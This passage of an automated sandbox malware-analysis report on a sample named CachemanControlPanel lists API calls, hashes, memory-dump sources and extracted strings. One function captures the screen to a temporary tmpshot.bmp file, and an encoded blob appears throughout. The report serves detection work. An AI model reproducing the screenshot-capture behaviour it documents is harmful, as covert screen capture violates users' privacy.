                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$File$Alloc$FreeWritememcpy$CloseCreateDeleteHandle
                                                        • String ID: $(
                                                        • API String ID: 3606555581-55695022
                                                        • Opcode ID: ee055060dc97740285fe6aa0357f3909fbac68ec831672dd4ef7a29edea06b80
                                                        • Instruction ID: 9aab3accc877f4fce0584e022fe851d7e1862128cea8e6ea30a189e11ad4578c
                                                        • Opcode Fuzzy Hash: ee055060dc97740285fe6aa0357f3909fbac68ec831672dd4ef7a29edea06b80
                                                        • Instruction Fuzzy Hash: 6EF1E6B19083459FD720DF15DC407ABBBE4AFC4305F08492EF98897351E739EA498B9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TlsAlloc.KERNEL32(?,?,00418768,004186D0,00000000), ref: 0042045E
                                                        • InitializeCriticalSection.KERNEL32(00434170,?,?,00418768,004186D0,00000000), ref: 0042046A
                                                        • TlsGetValue.KERNEL32(?,?,00418768,004186D0,00000000), ref: 00420480
                                                        • HeapAlloc.KERNEL32(00000008,00000014,?,?,00418768,004186D0,00000000), ref: 0042049A
                                                        • EnterCriticalSection.KERNEL32(00434170,?,?,00418768,004186D0,00000000), ref: 004204AB
                                                        • LeaveCriticalSection.KERNEL32(00434170,?,?,?,00418768,004186D0,00000000), ref: 004204C7
                                                        • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,00418768,004186D0,00000000), ref: 004204E0
                                                        • GetCurrentThread.KERNEL32 ref: 004204E3
                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,00418768,004186D0,00000000), ref: 004204EA
                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,00418768,004186D0,00000000), ref: 004204ED
                                                        • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,00420546,00000000,000000FF,00000008), ref: 00420503
                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,00418768,004186D0,00000000), ref: 00420510
                                                        • HeapAlloc.KERNEL32(00000000,0000000C,?,?,00418768,004186D0,00000000), ref: 00420521
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                        • String ID:
                                                        • API String ID: 298514914-0
                                                        • Opcode ID: 268e4a9056980c488d98ab2233537914818aab873ea479ddd1690247689a55cd
                                                        • Instruction ID: 554a9c1731e24c2a84e7252e7f5383d5cc338bdefa2102db05b93ad078862be6
                                                        • Opcode Fuzzy Hash: 268e4a9056980c488d98ab2233537914818aab873ea479ddd1690247689a55cd
                                                        • Instruction Fuzzy Hash: 7C213E71600311AFEB14AF64ED8CB567FE8FB58311F14953AF905972A1CBB49884CF68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • wcsncpy.MSVCRT ref: 00416BE5
                                                          • Part of subcall function 00418A10: TlsGetValue.KERNEL32(00000022,?,0043101C,0041641C,00000000,?,?,0043101C,?,00401123,0043101C,FFFFFFFF,00000002,00000000,00000000,00000001), ref: 00418A1A
                                                        • _wcsdup.MSVCRT ref: 00416C2E
                                                        • _wcsdup.MSVCRT ref: 00416C49
                                                        • _wcsdup.MSVCRT ref: 00416C6C
                                                        • wcsncpy.MSVCRT ref: 00416D58
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00416DBC
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00416DCF
                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00416DE2
                                                        • wcsncpy.MSVCRT ref: 00416E0E
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00416AF4
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ??3@_wcsdupwcsncpy$Value
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 3451606040-3176450862
                                                        • Opcode ID: c31b8d68d93be028ae30bd20fd853dd16fee187e129d4efbe8e2dbaa0548d6fc
                                                        • Instruction ID: f848b04c40278aa31661382ef494c5d6cfb73ceee9585c61303d1483f4ecf2aa
                                                        • Opcode Fuzzy Hash: c31b8d68d93be028ae30bd20fd853dd16fee187e129d4efbe8e2dbaa0548d6fc
                                                        • Instruction Fuzzy Hash: 2DA1AF716083019BC7209F18D8816ABB7B1FF90348F46092EF89597351E739DC95CB9B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemMetrics.USER32(00000000), ref: 00406F13
                                                        • GetSystemMetrics.USER32(00000001), ref: 00406F21
                                                        • GetDC.USER32(00000000), ref: 00406F4E
                                                        • BitBlt.GDI32(00CC0020,00000000,00000000,00000001,00000001,00000000,00000000,00000000,00CC0020), ref: 00406F93
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00406FA6
                                                          • Part of subcall function 004187A0: HeapFree.KERNEL32(02A80000,00000000,00000000,?,00000000,?,0041FFFD,00000000,00000000,00000000), ref: 004187B8
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00406EB9
                                                        • g2, xrefs: 00407034
                                                        • \tmpshot.bmp, xrefs: 00406EF9, 00406EFE
                                                        • TEMP, xrefs: 00406EEE, 00406EF3
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: MetricsSystem$FreeHeapRelease
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY$TEMP$\tmpshot.bmp$g2
                                                        • API String ID: 3029261087-3445587791
                                                        • Opcode ID: a6d68533a64e2df9fa28498c2616752b529fecbbc4f187444c9636541abbbdf3
                                                        • Instruction ID: 5e7c0da0fc53af7da53a8348919dd6667e29752873d446d4b25990864b06b304
                                                        • Opcode Fuzzy Hash: a6d68533a64e2df9fa28498c2616752b529fecbbc4f187444c9636541abbbdf3
                                                        • Instruction Fuzzy Hash: 5C416BB1048301BED601BB61DC02F5FBBA9EF84708F10893EF594651A1DA3AD9649B5B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00418710: TlsGetValue.KERNEL32(00000022,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00404AE3,00000000), ref: 00418727
                                                        • RegOpenKeyExW.ADVAPI32(0000000C,?,00000000,?,?,?,00000001,00000000,00000000,?,00000001,00000000,00000000,<8C,00000000,00000000), ref: 00401DAF
                                                        • RegCloseKey.ADVAPI32(00000000,0000000C,?,00000000,?,?,?,00000001,00000000,00000000,?,00000001,00000000,00000000,<8C,00000000), ref: 00401DCA
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                          • Part of subcall function 0040A200: TlsGetValue.KERNEL32(?,?,0040819F,00000000,00000002,00000000,00000000,00000000,00000000,00404B56,00000000,00000000,00000001,00000001,00000006,00000000), ref: 0040A208
                                                          • Part of subcall function 004187A0: HeapFree.KERNEL32(02A80000,00000000,00000000,?,00000000,?,0041FFFD,00000000,00000000,00000000), ref: 004187B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Value$CloseFreeHeapOpenwcslen
                                                        • String ID: <8C$<8C
                                                        • API String ID: 689962378-4290658125
                                                        • Opcode ID: e8c4dcb519f094cf7b3edc37b57dd1c8d19b0ff8dc08de08a2de002e6668cc76
                                                        • Instruction ID: 8537c1fc74a1aecd84c5a569c6264c3bf3b37e8840bf3e92ee522402ead88e76
                                                        • Opcode Fuzzy Hash: e8c4dcb519f094cf7b3edc37b57dd1c8d19b0ff8dc08de08a2de002e6668cc76
                                                        • Instruction Fuzzy Hash: 37512AB5508300BEE6017B619D46F7F76AAEBC4718F60C83FB144A51A2DA3DCC91962E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00420902
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00420924
                                                        • memset.MSVCRT ref: 0042093A
                                                        • CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00420988
                                                        • GetDIBits.GDI32(00000000,?,00000000,?,?,?,00000000), ref: 004209B3
                                                        • DeleteObject.GDI32(00000000), ref: 00420A7D
                                                        • DeleteDC.GDI32(00000000), ref: 00420A86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: CreateDeleteObject$BitsCompatibleSectionmemset
                                                        • String ID: (
                                                        • API String ID: 2223183535-3887548279
                                                        • Opcode ID: 0250f949b7a22ab322ceeba0500a4545d4bde395ab45c42fa7d6234fc3322447
                                                        • Instruction ID: 96dd73bc3e0c4326fafac672ce9342f69552ba2661e7ba198c4e73433065c985
                                                        • Opcode Fuzzy Hash: 0250f949b7a22ab322ceeba0500a4545d4bde395ab45c42fa7d6234fc3322447
                                                        • Instruction Fuzzy Hash: 8C418BB26083159FC310CF65E880A2FBBE9FFD8314F84492EF99593212E775D8058B56
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetObjectW.GDI32(00000000,00000018,?,?,?,?,?,?,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00000000,00000018,00406F45,FFFFFFFF,?,?), ref: 00411DD0
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00411E5E
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00411E6E
                                                        • CreateSolidBrush.GDI32(?), ref: 00411E8D
                                                        • FillRect.USER32(?,?,00000000), ref: 00411EA0
                                                        • DeleteObject.GDI32(00000000), ref: 00411EA7
                                                        • DeleteDC.GDI32(?), ref: 00411EAE
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00411D76
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDelete$BrushCompatibleFillRectSelectSolid
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 3640381715-3176450862
                                                        • Opcode ID: 3e7b80619ae022638b7ffcd92e0263bcd394e8833c37ff5206bdbcbfeea26069
                                                        • Instruction ID: 5d2f578523fddd707af583cf65cf112e0326cf9f23bf6446753309bf76c97b9a
                                                        • Opcode Fuzzy Hash: 3e7b80619ae022638b7ffcd92e0263bcd394e8833c37ff5206bdbcbfeea26069
                                                        • Instruction Fuzzy Hash: 704188759093449FC7109F99C8409AFBBE5BF89710F004A2EFE9093360C7B5D9818B9A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00417DD4: EnterCriticalSection.KERNEL32(00000020,?,?,?,0040D25F,00000000,004091C8,00001000,00000000,FFFFFFFF,?,00000000,00000000,00000000,00401B6E,004338C8), ref: 00417DDF
                                                          • Part of subcall function 00417DD4: LeaveCriticalSection.KERNEL32(00000020,?,?,?,0040D25F,00000000,004091C8,00001000,00000000,FFFFFFFF,?,00000000,00000000,00000000,00401B6E,004338C8), ref: 00417DF9
                                                        • GetObjectType.GDI32(00000000), ref: 00411F4B
                                                        • GetObjectW.GDI32(?,00000054,?,?,00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,?,?,?,?,?,?,?,?,00406F60), ref: 00411F7F
                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00411F99
                                                          • Part of subcall function 00420844: HeapAlloc.KERNEL32(00000008,00000184,?,00411FB8,-00000011,?,00000054,?,?,00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY), ref: 00420852
                                                          • Part of subcall function 00420844: TlsSetValue.KERNEL32(00000000,?,00411FB8,-00000011,?,00000054,?,?,00000000,?,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY), ref: 00420861
                                                        • GdiGetBatchLimit.GDI32 ref: 00411FE2
                                                        • GdiSetBatchLimit.GDI32(00000001), ref: 00411FF0
                                                        • SelectObject.GDI32(?), ref: 00412002
                                                        • DeleteObject.GDI32 ref: 0041205E
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00411F2B
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Object$BatchCriticalLimitSection$AllocCompatibleCreateDeleteEnterHeapLeaveSelectTypeValue
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 908520410-3176450862
                                                        • Opcode ID: ea3bf0c1da6a3cca6275b8913d1675f3ab75cfc08bfcb77f65ee24ee0de24fbb
                                                        • Instruction ID: c149a4a3e12a3397e3585b967bd8ca8be6e2d99ea89cd9ff1ae5934156ef8c69
                                                        • Opcode Fuzzy Hash: ea3bf0c1da6a3cca6275b8913d1675f3ab75cfc08bfcb77f65ee24ee0de24fbb
                                                        • Instruction Fuzzy Hash: 3A31D0B1A00716ABD7259F25DD487EBBAE4FF49700F00422AF608D2210D7B9D9A5CBD9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LoadLibraryW.KERNEL32(Kernel32.dll,?,00000000,?,00000004,00000000,004181D0,0043412C,h4AC,00000000,?,?,77E34620,0040BFB1,?,00000010), ref: 004183CC
                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 004183E1
                                                        • FreeLibrary.KERNEL32(00000000), ref: 004183FC
                                                        • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0041840B
                                                        • Sleep.KERNEL32(00000000), ref: 0041841D
                                                        • InterlockedExchange.KERNEL32(?,00000002), ref: 00418430
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                        • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                        • API String ID: 2918862794-1339284965
                                                        • Opcode ID: 2a024053e845fcfb5b4d344be4b4d810f7f3c43a962b44670668b06982312d27
                                                        • Instruction ID: 535d70f41936a1272df456fe688a735577c3d48d109d265f64d84dc01e7ab52e
                                                        • Opcode Fuzzy Hash: 2a024053e845fcfb5b4d344be4b4d810f7f3c43a962b44670668b06982312d27
